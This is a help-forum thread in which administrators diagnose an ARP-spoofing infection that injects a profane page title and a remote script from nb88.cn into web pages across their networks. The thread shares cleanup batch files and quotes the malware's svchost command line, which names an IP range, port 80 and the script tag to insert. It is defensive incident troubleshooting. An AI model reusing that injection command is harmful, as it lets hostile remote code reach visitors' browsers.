Fast Spreading infection, Unknown to all Virus, Spyware, Malware Cleaners

Do not Click the Link above as it is points to known Infected Domain

We have found that all machines connected (20ish) to the network with the exception of 1 is experiencing the issue.  No other issues are being reported or found during investigation.

We are also getting this on a number of networked machines.  Anyone have any ideas?  Thanks.

This site identifies the problem, and elsewhere on the site suggests possible solutions

http://malwaredomains.com/?p=223

i have the same problem
any body have any ideas

A temporary fix can be had by creating an entry for nb88.cn in your Hosts file, and redirecting it to 127.0.0.1

http://www.mvps.org/winhelp2002/hosts.htm

i have not been able to detect this with anyhing

what is happening
what server is infected is it web sql
and where

thanks

my problem is on my web servers
its broadcasting the message to  the world
that fix does not work on a server

That is true - but please bear in mind that this is someone else's question!  ;-))

What I suggest is that you post a new question into a more appropriate zone (server based, rather than client based), and I'm sure nobody would mind you linking the two questions together by posting cross references.  

Otherwise people reading this are going to get confused!

i posted the question under the security/ misc group.

https://www.experts-exchange.com/questions/23505410/IIS-server-hacked-fuck-th3-w0rld-entered-into-title-cannot-find-infection-anywhere.html

I've copied this from my answer at https://www.experts-exchange.com/questions/23505410/IIS-server-hacked-fuck-th3-w0rld-entered-into-title-cannot-find-infection-anywhere.html, in case it's of use:

Okay.  We've now fixed out problem.

Firstly, it would appear there is nothing running on the webservers themselves.  It looks to me like a process running on the SQL Server is affecting the IIS machines (maybe via DCOM?).  

In our case, we found that rebooting the SQL Server machine *and not logging onto it* fixed the problem.  As soon as someone logged onto the machine either via TS, or on the console, the problem came back.

So, we looked at the /run regkey in, and sure enough it was running an unknown process at user login - I'm sorry, I can't remember what the process was called (just wanted to delete it!), but that has now fixed our problem.

Of course, we also had a number of other nasties on the SQL server which need to be sorted, but at least we have a little more time to fix that.

So, I would recommend looking very closely at your SQL servers.  Turn them off if necessary and see if the problem goes away on the web servers.  If it does, at least you know where to look.

It's been a long night!

Thanks Adds21 we are working through our multiple SQL servers right now to find the culprit/culprits.

I have the same problem but not installed sql on the infected server. All sites on these machine has the same problem, asp pages or html pages. I think is corrupted iis. Thanks for help

I have the same issue with one of our servers. Does anyone else know what the process was called.
Our server application only uses paramertized stored procedures for accessing the database I don't see how it could have been vulnerable to an injection attack.

see here

https://www.experts-exchange.com/questions/23505410/IIS-server-hacked-fuck-th3-w0rld-entered-into-title-cannot-find-infection-anywhere.html

it was my post, the infection is on sql, check all teh sql server and check the run regkey, you will see a process, kill it under task manager and remove from startup you will be ok

tehn use teh windows malicious software tool to scan them all and remove

Granted I'm no security expert - I don't even know what to look for when you say "check the run regkey" but I haven't been able to see any evidence of a hack. I've scanned the system with AVG and found nothing. The server in question is a stand-alone with no other machines on the domain (and no trusts) and I have only had reports of the offense page title coming from one network (the owners of the server we're managing). Is it possble that the worm could just be on their internal network and not on the Web server?

I am working with a client who as the same issue.  Also with this issue is an inability to browse the web on some machines.  There are no MS SQL servers but there is the smaller engine as wel.  Please Help.

Chili-  We are in the process of narrowing it down currently.  It seems that any SQL engine is vulnerable.  How large is your network?

RTPIT

The network is about 50 pcs.  about 10 are running the free version of MS SQL.  But no full blown SQL servers on the network.  Has anyone disovered the process to look for or any virus scanner or malware scanner which detects this PITA?  What is wierd is on the machines that cannot connect to the internet they cannot ping the gateway address.  But they have access to all the internal applications and servers.  The arp table sometimes shows the mac address as all 0 and shows it as invalid.  Wireshark doesn't seem to show anything unusual from one of these machines either.  Although I am not real sure what to look for.  Any help would be appreciated.

Thanks!

We haven't found any processes running on the servers.  I have scowwered them with a fine tooth comb.  Just to make this more frustrating if we install a wireless card into one of the "infected" machines and connect to our seperate guest network the problem disappears.  The best we can tell this initial PITA is meant to download the real trouble but Symantec is blocking it.  I used Wire Shark, IPView from MS the former Sysinternals software, and a few open source utilities and nothing.  I talked with our sister company an ISP and they had me try a simple netstat -an to see what ports each machine are listening on.  This didn't give me any answers just more shots in the dark.

RTPIT

Yep same thing here we did the netstat right away but haven't found anything.  If we could at least locate which pc was causing the issue I might be able to get a clue but this is really getting frustrating.  We even thought maybe our router was compromised and put in a new router.  The only clue we found was that if we spoofed a mac address of a working machine on an "infected" machine then we could get out.  So whatever is causing this is working at the mac address level.  Nothing is showing up on wireshark or any packet sniffer that looks odd to me or any of my staff.  I have suggested to shut every machine on the network down and bring them back up one by one testing each one as it come up to see if it causes the issues.

Also we have the same issue with wireless that you do.  If we put a wireless card in a pc it is fine.  Most likely because the mac address of the access point is okay for some reason.  I just don't know why or how this is possible.

Chili,

Do you have any machines that are not experiencing the issue?  We have a small handful of machines that are chugging along unaffected.  I have compared them at great lengths, but I haven't found anything that makes one vulnerable and one not.  If you have any ideas, feel free to bounce them off of us.  The environments we are in are very similar.  

RTPIT

We have some machines like yours that seem unaffected they can browse the web just fine but they still have F*** th3 W0rld!  injected in the headers of thier webpages.  BTW changing the router has not helped us out at all either.  

all machines on your internal network wil appear unaffected, thats the confusing part about this infection, its an arp attack, it changes teh default gateway of the network to the infected machine via arp.

simple way to confirm this thi stake one of you infected machines and change the ip, it will look clean again.

ther is one machine on the network with the arp process running, kill that, and all will be corrected

Bluswitch-  Any ideas what the ARP process is?

sorry, but when i saw the infection, i delted so quickly that i didnt write down what it was

Im my case there was an .exe created at the same time as the DLL's and that was called wapsrv.exe.

that sounds familiar, this was an incredible attack, it tooks hours before we realized what it was, and originally thought all machines were infected

I found the culprit I made 2 scripts one for 2000 and one for XP/Server

2000.bat
del c:\WINNT\system32\packet.dll
del c:\WINNT\system32\wanpacket.dll
del c:\WINNT\system32\wapsrv.exe
del c:\WINNT\system32\wpcap.dll
del c:\WINNT\system32\drivers\npf.sys
pause

XP/Server
del c:\windows\system32\packet.dll
del c:\windows\system32\wanpacket.dll
del c:\windows\system32\wapsrv.exe
del c:\windows\system32\wpcap.dll
del c:\windows\system32\drivers\npf.sys
pause

These batches did find some files and delete them but eventually I found one machine with access denied on the deletion.  After looking over the processes there was only one process svhost.exe process run by the local user account, it's switch was:

C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script><title>Fuck Th3 W0rld!</title>"

Thanks again stephenevans

svchost.exe was being run from c:\windows\system32\waptimes.exe

Triggered from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Yep we found the same thing RTPIT.  Our client is so freaked that they requested we wipe the machine for them and reload everything.  

Just another head's up the program we found was called arpinsert.exe triggered from

HKEY_LOCAL_Machine\Software\Microsoft\Windows\CurrentVersion\Run

So there maybe more variants of this nasty going around.